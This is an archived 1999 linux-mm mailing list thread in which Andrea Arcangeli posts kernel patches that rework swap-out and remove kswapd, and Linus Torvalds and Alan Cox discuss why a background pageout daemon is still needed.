-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
 
-static int kswapd_free_pages(int kswapd_state)
+	if (swap_out(priority, gfp_mask))
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
+
+	return 0;
+}
+
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 8;
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	switch (*state) {
+		do {
+		default:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 0;
+
+			shrink_dcache_memory(priority, gfp_mask);
+			kmem_cache_reap(gfp_mask);
+		} while (--priority >= 0);
+	}
+	return 0;
+}
 
+static int kswapd_free_pages(int kswapd_state)
+{
 	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 8;
-		int count = pager_daemon.swap_cluster;
+	unsigned long end_time = jiffies + (HZ-1)/100;
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				free_memory(swap_out(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+	do {
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
 			break;
 	} while (time_before_eq(jiffies,end_time));
+	/* take kswapd_state on the stack to save some byte of memory */
 	return kswapd_state;
 }
 
+static inline void enable_swap_tick(void)
+{
+	timer_table[SWAP_TIMER].expires = jiffies+(HZ+99)/100;
+	timer_active |= 1<<SWAP_TIMER;
+}
+
 /*
  * The background pageout daemon.
  * Started as a kernel thread from the init process.
@@ -524,6 +571,7 @@
 		current->state = TASK_INTERRUPTIBLE;
 		flush_signals(current);
 		run_task_queue(&tq_disk);
+		enable_swap_tick();
 		schedule();
 		swapstats.wakeups++;
 		state = kswapd_free_pages(state);
@@ -543,35 +591,23 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
-
 		current->flags |= PF_MEMALLOC;
-	
-		priority = 8;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		while (count--)
+		{
+			static int state = 0;
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+		}
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
@@ -594,7 +630,8 @@
 	if (priority) {
 		p->counter = p->priority << priority;
 		wake_up_process(p);
-	}
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -632,9 +669,8 @@
 			want_wakeup = 3;
 	
 		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -643,7 +679,6 @@
 
 void init_swap_timer(void)
 {
-	timer_table[SWAP_TIMER].expires = jiffies;
 	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
+	enable_swap_tick();
 }



As usual, if you, Steve, or others try this, I am interested in the
numbers ;). Thanks.

Andrea Arcangeli


^ permalink raw reply	[relevance 32%]

* Bug in the mmap code?
@ 1999-01-03 22:00 64% Eric W. Biederman
  1999-01-03 22:36 64% ` Eric W. Biederman
  0 siblings, 1 reply; 200+ results
From: Eric W. Biederman @ 1999-01-03 22:00 UTC (permalink / raw)
  To: linux-mm


I have just been looking through the mmap code,
with emphasis on generic_file_mmap.

What I have discovered is that generic_file_mmap increases file->f_count
but nothing decreases said count.

file->f_count is also increased by the generic code if a vma is split
in half by an unmap operation.

Should the generic code handle this or should we leave all of that
work to the open and close methods?

Eric



^ permalink raw reply	[relevance 64%]

* Re: Bug in the mmap code?
  1999-01-03 22:00 64% Bug in the mmap code? Eric W. Biederman
@ 1999-01-03 22:36 64% ` Eric W. Biederman
  0 siblings, 0 replies; 200+ results
From: Eric W. Biederman @ 1999-01-03 22:36 UTC (permalink / raw)
  To: linux-mm


Dah.  We are calling fput everywhere in the generic code just fine.


Eric

^ permalink raw reply	[relevance 64%]

* [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-03  2:59 32%                 ` Andrea Arcangeli
@ 1999-01-04 18:08 28%                   ` Andrea Arcangeli
  1999-01-04 20:56 62%                     ` Linus Torvalds
  1999-01-05 13:33 62%                   ` [patch] new-vm improvement [Re: 2.2.0 Bug summary] Ben McCann
  1 sibling, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-04 18:08 UTC (permalink / raw)
  To: Steve Bergman
  Cc: Linus Torvalds, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

I have a new revolutionary patch. The main thing is that I killed kswapd
just to make Rik happy ;).

Ah, and my last patches had a little bug that was surely hurting
performance compared to Linus's VM: I was stopping kswapd as soon as
nr_free_pages > freepages.high was true, and not, as Linus was rightly
doing, when nr_free_pages > freepages.high + swap_cluster. So I was
causing a lot of kswapd wakeups.
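
The effect of the extra swap_cluster margin can be sketched with a toy
model. Everything here is an assumption made for illustration:
count_wakeups() is not kernel code, the wake condition (nr_free <= high)
is simplified, and the real wakeup logic is different. The only thing
taken from the text above is the stop condition, nr_free > high + margin,
with margin being either 0 or swap_cluster.

```c
/*
 * Toy model: pages are allocated one at a time.  When free memory falls
 * to "high" the daemon is woken and frees pages until
 * nr_free > high + margin.  Returns how many times it was woken.
 */
static unsigned long count_wakeups(unsigned long high, unsigned long margin,
				   unsigned long allocations)
{
	unsigned long nr_free = high + margin + 1;	/* just above the stop point */
	unsigned long wakeups = 0;
	unsigned long i;

	for (i = 0; i < allocations; i++) {
		nr_free--;				/* one page allocated */
		if (nr_free <= high) {			/* low on memory: wake up */
			wakeups++;
			while (nr_free <= high + margin)
				nr_free++;		/* free until the stop condition */
		}
	}
	return wakeups;
}
```

In this model a margin of 0 means one wakeup per allocation, while a
margin of 32 pages means one wakeup per 33 allocations.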

There was also one thing still to improve in the trashing_memory
heuristic, namely to remove the trashing bit only if PF_MEMALLOC is not
set.

Ah, and the swapout code seems to prefer linear rather than exponential
priority handling. Probably it likes to succeed more than shrink_mmap()
does.
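
For comparison, the two ways of scaling the swapout weight by priority,
written as standalone helpers. The helper names are made up; the
formulas are "total_vm >> priority" from the previous patch and
"total_vm / (priority+1)" from calc_swapout_weight() in the diff below.

```c
/* Exponential: the budget halves with every priority step. */
static unsigned long weight_exponential(unsigned long total_vm,
					unsigned int priority)
{
	return total_vm >> priority;
}

/* Linear: the budget shrinks as 1/(priority+1). */
static unsigned long weight_linear(unsigned long total_vm,
				   unsigned int priority)
{
	return total_vm / (priority + 1);
}
```

At priority 0 both give the full total_vm. At the starting priority of 8
the exponential form scans total_vm/256 pages and the linear form
total_vm/9, so the linear version tries much harder on the early passes.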

If you try it, let me know. I am interested in the image load test
(which should be the closest to the real world).

With this patch the swapout performance is doubled. The swapout
benchmark that used to take 100 sec with my old code and with Linus's
VM now runs in 50 sec! I now get 6 Mbyte/sec (3 so and 3 si) instead of
3 Mbyte/sec (1.5 so, 1.5 si). 6 Mbyte/sec is the performance reported by
hdparm -t btw ;). And the whole system is perfectly fluid (far more fluid
than with the old code). I can open an xterm without waiting for
seconds. The cache does not get kicked out. It seems really great here.
When the system goes OOM it seems to recover fine.

Here is arca-vm-6 against 2.2.0-pre4:

Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.9 linux/mm/vmscan.c:1.1.1.1.2.62
--- linux/mm/vmscan.c:1.1.1.9	Sat Jan  2 15:46:20 1999
+++ linux/mm/vmscan.c	Mon Jan  4 18:42:54 1999
@@ -10,6 +10,12 @@
  *  Version: $Id: vmscan.c,v 1.5 1998/02/23 22:14:28 sct Exp $
  */
 
+/*
+ * Revisioned the page freeing algorithm (do_free_user_and_cache), and
+ * developed a smart mechanism to handle the swapout weight. Removed kswapd.
+ * Copyright (C) 1998  Andrea Arcangeli
+ */
+
 #include <linux/slab.h>
 #include <linux/kernel_stat.h>
 #include <linux/swap.h>
@@ -20,13 +26,6 @@
 
 #include <asm/pgtable.h>
 
-/* 
- * The wait queue for waking up the pageout daemon:
- */
-static struct task_struct * kswapd_task = NULL;
-
-static void init_swap_timer(void);
-
 /*
  * The swap-out functions return 1 if they successfully
  * threw something out, and we got a free page. It returns
@@ -163,7 +162,7 @@
 			 * cache. */
 			if (PageSwapCache(page_map)) {
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return 1;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -195,7 +194,7 @@
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return 1;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,9 +209,8 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
 	__free_page(page_map);
-	return entry;
+	return 1;
 }
 
 /*
@@ -230,7 +228,7 @@
  */
 
 static inline int swap_out_pmd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pte_t * pte;
 	unsigned long pmd_end;
@@ -251,18 +249,20 @@
 
 	do {
 		int result;
-		tsk->swap_address = address + PAGE_SIZE;
 		result = try_to_swap_out(tsk, vma, address, pte, gfp_mask);
+		address += PAGE_SIZE;
+		tsk->swap_address = address;
 		if (result)
 			return result;
-		address += PAGE_SIZE;
+		if (!--*counter)
+			return 0;
 		pte++;
 	} while (address < end);
 	return 0;
 }
 
 static inline int swap_out_pgd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pmd_t * pmd;
 	unsigned long pgd_end;
@@ -282,9 +282,11 @@
 		end = pgd_end;
 	
 	do {
-		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask);
+		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PMD_SIZE) & PMD_MASK;
 		pmd++;
 	} while (address < end);
@@ -292,7 +294,7 @@
 }
 
 static int swap_out_vma(struct task_struct * tsk, struct vm_area_struct * vma,
-	unsigned long address, int gfp_mask)
+	unsigned long address, int gfp_mask, unsigned long * counter)
 {
 	pgd_t *pgdir;
 	unsigned long end;
@@ -306,16 +308,19 @@
 
 	end = vma->vm_end;
 	while (address < end) {
-		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask);
+		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PGDIR_SIZE) & PGDIR_MASK;
 		pgdir++;
 	}
 	return 0;
 }
 
-static int swap_out_process(struct task_struct * p, int gfp_mask)
+static int swap_out_process(struct task_struct * p, int gfp_mask,
+			    unsigned long * counter)
 {
 	unsigned long address;
 	struct vm_area_struct* vma;
@@ -334,9 +339,12 @@
 			address = vma->vm_start;
 
 		for (;;) {
-			int result = swap_out_vma(p, vma, address, gfp_mask);
+			int result = swap_out_vma(p, vma, address, gfp_mask,
+						  counter);
 			if (result)
 				return result;
+			if (!*counter)
+				return 0;
 			vma = vma->vm_next;
 			if (!vma)
 				break;
@@ -350,6 +358,25 @@
 	return 0;
 }
 
+static inline unsigned long calc_swapout_weight(int priority)
+{
+	struct task_struct * p;
+	unsigned long total_vm = 0;
+
+	read_lock(&tasklist_lock);
+	for_each_task(p)
+	{
+		if (!p->swappable)
+			continue;
+		if (p->mm->rss == 0)
+			continue;
+		total_vm += p->mm->total_vm;
+	}
+	read_unlock(&tasklist_lock);
+
+	return total_vm / (priority+1);
+}
+
 /*
  * Select the task with maximal swap_cnt and try to swap out a page.
  * N.B. This function returns only 0 or 1.  Return values != 1 from
@@ -358,8 +385,11 @@
 static int swap_out(unsigned int priority, int gfp_mask)
 {
 	struct task_struct * p, * pbest;
-	int counter, assign, max_cnt;
+	int assign;
+	unsigned long counter, max_cnt;
 
+	counter = calc_swapout_weight(priority);
+
 	/* 
 	 * We make one or two passes through the task list, indexed by 
 	 * assign = {0, 1}:
@@ -374,23 +404,17 @@
 	 * Think of swap_cnt as a "shadow rss" - it tells us which process
 	 * we want to page out (always try largest first).
 	 */
-	counter = nr_tasks / (priority+1);
-	if (counter < 1)
-		counter = 1;
-	if (counter > nr_tasks)
-		counter = nr_tasks;
-
-	for (; counter >= 0; counter--) {
+	while (counter != 0) {
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
 	select:
 		read_lock(&tasklist_lock);
-		p = init_task.next_task;
-		for (; p != &init_task; p = p->next_task) {
+		for_each_task(p)
+		{
 			if (!p->swappable)
 				continue;
-	 		if (p->mm->rss <= 0)
+	 		if (p->mm->rss == 0)
 				continue;
 			/* Refresh swap_cnt? */
 			if (assign)
@@ -410,127 +434,51 @@
 		}
 
 		/*
-		 * Nonzero means we cleared out something, but only "1" means
-		 * that we actually free'd up a page as a result.
+		 * Nonzero means we cleared out something, and "1" means
+		 * that we actually moved a page from the process memory
+		 * to the swap cache (it's not been freed yet).
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
+		if (swap_out_process(pbest, gfp_mask, &counter))
 			return 1;
 	}
 out:
 	return 0;
 }
 
-/*
- * Before we start the kernel thread, print out the 
- * kswapd initialization message (otherwise the init message 
- * may be printed in the middle of another driver's init 
- * message).  It looks very bad when that happens.
- */
-void __init kswapd_setup(void)
+static int do_free_user_and_cache(int priority, int gfp_mask)
 {
-       int i;
-       char *revision="$Revision: 1.5 $", *s, *e;
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
 
-       swap_setup();
-       
-       if ((s = strchr(revision, ':')) &&
-           (e = strchr(s, '$')))
-               s++, i = e - s;
-       else
-               s = revision, i = -1;
-       printk ("Starting kswapd v%.*s\n", i, s);
-}
-
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
-
-static int kswapd_free_pages(int kswapd_state)
-{
-	unsigned long end_time;
-
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
-
-	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 8;
-		int count = pager_daemon.swap_cluster;
+	if (swap_out(priority, gfp_mask & ~__GFP_WAIT))
+		/*
+		 * We made at least some swapping progress, so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				free_memory(swap_out(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
-			break;
-	} while (time_before_eq(jiffies,end_time));
-	return kswapd_state;
+	return 0;
 }
 
-/*
- * The background pageout daemon.
- * Started as a kernel thread from the init process.
- */
-int kswapd(void *unused)
+static int do_free_page(int * state, int gfp_mask)
 {
-	current->session = 1;
-	current->pgrp = 1;
-	strcpy(current->comm, "kswapd");
-	sigfillset(&current->blocked);
-	
-	/*
-	 *	As a kernel thread we want to tamper with system buffers
-	 *	and other internals and thus be subject to the SMP locking
-	 *	rules. (On a uniprocessor box this does nothing).
-	 */
-	lock_kernel();
+	int priority = 6;
 
-	/*
-	 * Set the base priority to something smaller than a
-	 * regular process. We will scale up the priority
-	 * dynamically depending on how much memory we need.
-	 */
-	current->priority = (DEF_PRIORITY * 2) / 3;
-
-	/*
-	 * Tell the memory management that we're a "memory allocator",
-	 * and that if we need more memory we should get access to it
-	 * regardless (see "try_to_free_pages()"). "kswapd" should
-	 * never get caught in the normal page freeing logic.
-	 *
-	 * (Kswapd normally doesn't need memory anyway, but sometimes
-	 * you need a small amount of memory in order to be able to
-	 * page out something else, and this flag essentially protects
-	 * us from recursively trying to free more memory as we're
-	 * trying to free the first piece of memory in the first place).
-	 */
-	current->flags |= PF_MEMALLOC;
+	switch (*state) {
+		do {
+		case 0:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 0;
 
-	init_swap_timer();
-	kswapd_task = current;
-	while (1) {
-		int state = 0;
-
-		current->state = TASK_INTERRUPTIBLE;
-		flush_signals(current);
-		run_task_queue(&tq_disk);
-		schedule();
-		swapstats.wakeups++;
-		state = kswapd_free_pages(state);
+			shrink_dcache_memory(priority, gfp_mask);
+			kmem_cache_reap(gfp_mask);
+		} while (--priority >= 0);
 	}
-	/* As if we could ever get here - maybe we want to make this killable */
-	kswapd_task = NULL;
-	unlock_kernel();
 	return 0;
 }
 
@@ -543,107 +491,26 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
-
 		current->flags |= PF_MEMALLOC;
-	
-		priority = 8;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		while (count--)
+		{
+			static int state = 0;
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+		}
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
 
 	return retval;
-}
-
-/*
- * Wake up kswapd according to the priority
- *	0 - no wakeup
- *	1 - wake up as a low-priority process
- *	2 - wake up as a normal process
- *	3 - wake up as an almost real-time process
- *
- * This plays mind-games with the "goodness()"
- * function in kernel/sched.c.
- */
-static inline void kswapd_wakeup(struct task_struct *p, int priority)
-{
-	if (priority) {
-		p->counter = p->priority << priority;
-		wake_up_process(p);
-	}
-}
-
-/* 
- * The swap_tick function gets called on every clock tick.
- */
-void swap_tick(void)
-{
-	struct task_struct *p = kswapd_task;
-
-	/*
-	 * Only bother to try to wake kswapd up
-	 * if the task exists and can be woken.
-	 */
-	if (p && (p->state & TASK_INTERRUPTIBLE)) {
-		unsigned int pages;
-		int want_wakeup;
-
-		/*
-		 * Schedule for wakeup if there isn't lots
-		 * of free memory or if there is too much
-		 * of it used for buffers or pgcache.
-		 *
-		 * "want_wakeup" is our priority: 0 means
-		 * not to wake anything up, while 3 means
-		 * that we'd better give kswapd a realtime
-		 * priority.
-		 */
-		want_wakeup = 0;
-		pages = nr_free_pages;
-		if (pages < freepages.high)
-			want_wakeup = 1;
-		if (pages < freepages.low)
-			want_wakeup = 2;
-		if (pages < freepages.min)
-			want_wakeup = 3;
-	
-		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
-}
-
-/* 
- * Initialise the swap timer
- */
-
-void init_swap_timer(void)
-{
-	timer_table[SWAP_TIMER].expires = jiffies;
-	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
 }
Index: linux/mm/page_alloc.c
diff -u linux/mm/page_alloc.c:1.1.1.5 linux/mm/page_alloc.c:1.1.1.1.2.14
--- linux/mm/page_alloc.c:1.1.1.5	Sun Jan  3 20:42:44 1999
+++ linux/mm/page_alloc.c	Mon Jan  4 18:42:54 1999
@@ -260,7 +260,8 @@
 		if (nr_free_pages > freepages.min) {
 			if (!current->trashing_memory)
 				goto ok_to_allocate;
-			if (nr_free_pages > freepages.low) {
+			if (!(current->flags & PF_MEMALLOC) &&
+			    nr_free_pages > freepages.low) {
 				current->trashing_memory = 0;
 				goto ok_to_allocate;
 			}
@@ -271,7 +272,7 @@
 		 * memory.
 		 */
 		current->trashing_memory = 1;
-		if (!try_to_free_pages(gfp_mask, SWAP_CLUSTER_MAX) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
+		if (!try_to_free_pages(gfp_mask, freepages.high - nr_free_pages + (1<<order)) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
 			goto nopage;
 	}
 ok_to_allocate:
Index: linux/init/main.c
diff -u linux/init/main.c:1.1.1.5 linux/init/main.c:1.1.1.1.2.9
--- linux/init/main.c:1.1.1.5	Tue Dec 29 01:39:16 1998
+++ linux/init/main.c	Mon Jan  4 18:42:54 1999
@@ -63,8 +63,6 @@
 
 static int init(void *);
 extern int bdflush(void *);
-extern int kswapd(void *);
-extern void kswapd_setup(void);
 
 extern void init_IRQ(void);
 extern void init_modules(void);
@@ -1269,9 +1267,6 @@
 
 	/* Launch bdflush from here, instead of the old syscall way. */
 	kernel_thread(bdflush, NULL, CLONE_FS | CLONE_FILES | CLONE_SIGHAND);
-	/* Start the background pageout daemon. */
-	kswapd_setup();
-	kernel_thread(kswapd, NULL, CLONE_FS | CLONE_FILES | CLONE_SIGHAND);
 
 #if CONFIG_AP1000
 	/* Start the async paging daemon. */
Index: linux/include/linux/mm.h
diff -u linux/include/linux/mm.h:1.1.1.3 linux/include/linux/mm.h:1.1.1.1.2.13
--- linux/include/linux/mm.h:1.1.1.3	Sat Jan  2 15:24:18 1999
+++ linux/include/linux/mm.h	Mon Jan  4 18:42:52 1999
@@ -118,7 +118,6 @@
 	unsigned long offset;
 	struct page *next_hash;
 	atomic_t count;
-	unsigned int unused;
 	unsigned long flags;	/* atomic flags, some possibly updated asynchronously */
 	struct wait_queue *wait;
 	struct page **pprev_hash;
@@ -295,8 +294,7 @@
 
 /* filemap.c */
 extern void remove_inode_page(struct page *);
-extern unsigned long page_unuse(struct page *);
-extern int shrink_mmap(int, int);
+extern int FASTCALL(shrink_mmap(int, int));
 extern void truncate_inode_pages(struct inode *, unsigned long);
 extern unsigned long get_cached_page(struct inode *, unsigned long, int);
 extern void put_cached_page(unsigned long);
Index: linux/mm/swap.c
diff -u linux/mm/swap.c:1.1.1.5 linux/mm/swap.c:1.1.1.1.2.8
--- linux/mm/swap.c:1.1.1.5	Sat Jan  2 15:24:40 1999
+++ linux/mm/swap.c	Sat Jan  2 21:40:13 1999
@@ -64,13 +64,13 @@
 swapstat_t swapstats = {0};
 
 buffer_mem_t buffer_mem = {
-	2,	/* minimum percent buffer */
+	5,	/* minimum percent buffer */
 	10,	/* borrow percent buffer */
 	60	/* maximum percent buffer */
 };
 
 buffer_mem_t page_cache = {
-	2,	/* minimum percent page cache */
+	5,	/* minimum percent page cache */
 	15,	/* borrow percent page cache */
 	75	/* maximum */
 };
Index: linux/include/linux/swap.h
diff -u linux/include/linux/swap.h:1.1.1.4 linux/include/linux/swap.h:1.1.1.1.2.9
--- linux/include/linux/swap.h:1.1.1.4	Tue Dec 29 01:39:03 1998
+++ linux/include/linux/swap.h	Tue Dec 29 02:19:08 1998
@@ -167,9 +167,11 @@
 	count = atomic_read(&page->count);
 	if (PageSwapCache(page))
 	{
+#if 0
 		/* PARANOID */
 		if (page->inode != &swapper_inode)
 			panic("swap cache page has wrong inode\n");
+#endif
 		count += swap_count(page->offset) - 2;
 	}
 	if (PageFreeAfter(page))


--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org


* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 18:08 28%                   ` [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]] Andrea Arcangeli
@ 1999-01-04 20:56 62%                     ` Linus Torvalds
  1999-01-04 21:10 64%                       ` Rik van Riel
                                         ` (2 more replies)
  0 siblings, 3 replies; 200+ results
From: Linus Torvalds @ 1999-01-04 20:56 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Steve Bergman, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm



On Mon, 4 Jan 1999, Andrea Arcangeli wrote:
>
> I have a new revolutionary patch. The main thing is that I killed kswapd
> just to make Rik happy ;).

Ehh..

You may have made Rik happy, but you totally missed the reason for kswapd. 
And while your patch looked interesting (a lot cleaner than the previous
ones, and I _like_ patches that remove code), the fact that you killed
kswapd means that it is essentially useless. 

Basically, we _have_ to have kswapd, and I'll tell you why:
 - imagine running low on memory due to GFP_ATOMIC
 - imagine not having any normal processes that do memory allocation.

Boom. You just killed the machine with your patch, because maybe the
GFP_ATOMIC things are what the machine is doing. Imagine a machine that
acts as a router - it might not even be running any normal user processes
at _all_, but it had damn well better make sure that memory is always
available some way. "kswapd" did that for us, and Rik's happiness counts
as nothing in the face of basic facts of life like that. Sorry.
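
The argument above can be illustrated with a small user-space simulation.
This is only a sketch under stated assumptions, not kernel code:
struct page_pool, alloc_atomic(), background_reclaim() and simulate() are
hypothetical names, and the two watermarks merely stand in for values such
as freepages.low and freepages.high. The atomic path may not sleep, so it
can only take a page that is already free; if nothing else ever reclaims,
a load made up only of atomic allocations runs the pool dry.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical model of the free-page pool (not a kernel structure). */
struct page_pool {
	unsigned long nr_free;		/* pages free right now */
	unsigned long nr_reclaimable;	/* pages a reclaim pass could free */
	unsigned long low_mark;		/* background reclaim starts below this */
	unsigned long high_mark;	/* background reclaim stops at this */
};

/* Atomic-context allocation: it cannot sleep, so it cannot reclaim. */
static bool alloc_atomic(struct page_pool *pool)
{
	if (pool->nr_free == 0)
		return false;
	pool->nr_free--;
	return true;
}

/* Stand-in for one run of a background daemon; returns pages freed. */
static unsigned long background_reclaim(struct page_pool *pool)
{
	unsigned long freed = 0;

	assert(pool->low_mark <= pool->high_mark);
	if (pool->nr_free >= pool->low_mark)
		return 0;
	while (pool->nr_free < pool->high_mark && pool->nr_reclaimable > 0) {
		pool->nr_reclaimable--;
		pool->nr_free++;
		freed++;
	}
	return freed;
}

/*
 * Issue n atomic allocations against a copy of the pool and return how
 * many of them failed. With with_daemon set, the background step gets a
 * chance to run before every allocation.
 */
static unsigned long simulate(struct page_pool pool, unsigned long n,
			      bool with_daemon)
{
	unsigned long failed = 0;
	unsigned long i;

	for (i = 0; i < n; i++) {
		if (with_daemon)
			background_reclaim(&pool);
		if (!alloc_atomic(&pool))
			failed++;
	}
	return failed;
}
```

With 4 free pages, 100 reclaimable pages, watermarks of 2 and 8, and 20
atomic requests, simulate() reports 16 failures without the background
step and none with it.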

		Linus


* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 20:56 62%                     ` Linus Torvalds
  1999-01-04 21:10 64%                       ` Rik van Riel
@ 1999-01-04 22:04 64%                       ` Alan Cox
  1999-01-04 21:55 64%                         ` Linus Torvalds
  1999-01-04 22:43 56%                         ` [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]] Andrea Arcangeli
  1999-01-04 22:29 64%                       ` Andrea Arcangeli
  2 siblings, 2 replies; 200+ results
From: Alan Cox @ 1999-01-04 22:04 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: andrea, steve, bredelin, sct, linux-kernel, alan, H.H.vanRiel,
	linux-mm

> Boom. You just killed the machine with your patch, because maybe the
> GFP_ATOMIC things are what the machine is doing. Imagine a machine that
> acts as a router - it might not even be running any normal user processes
> at _all_, but it had damn well better make sure that memory is always
> available some way. "kswapd" did that for us, and Rik's happiness counts
> as nothing in the face of basic facts of life like that. Sorry.

Its performance properties are very interesting however. They do seem to suggest
kswapd should be more of a last resort. 

Alan



* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 22:04 64%                       ` Alan Cox
@ 1999-01-04 21:55 64%                         ` Linus Torvalds
  1999-01-04 22:51 64%                           ` Andrea Arcangeli
  1999-01-04 22:43 56%                         ` [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]] Andrea Arcangeli
  1 sibling, 1 reply; 200+ results
From: Linus Torvalds @ 1999-01-04 21:55 UTC (permalink / raw)
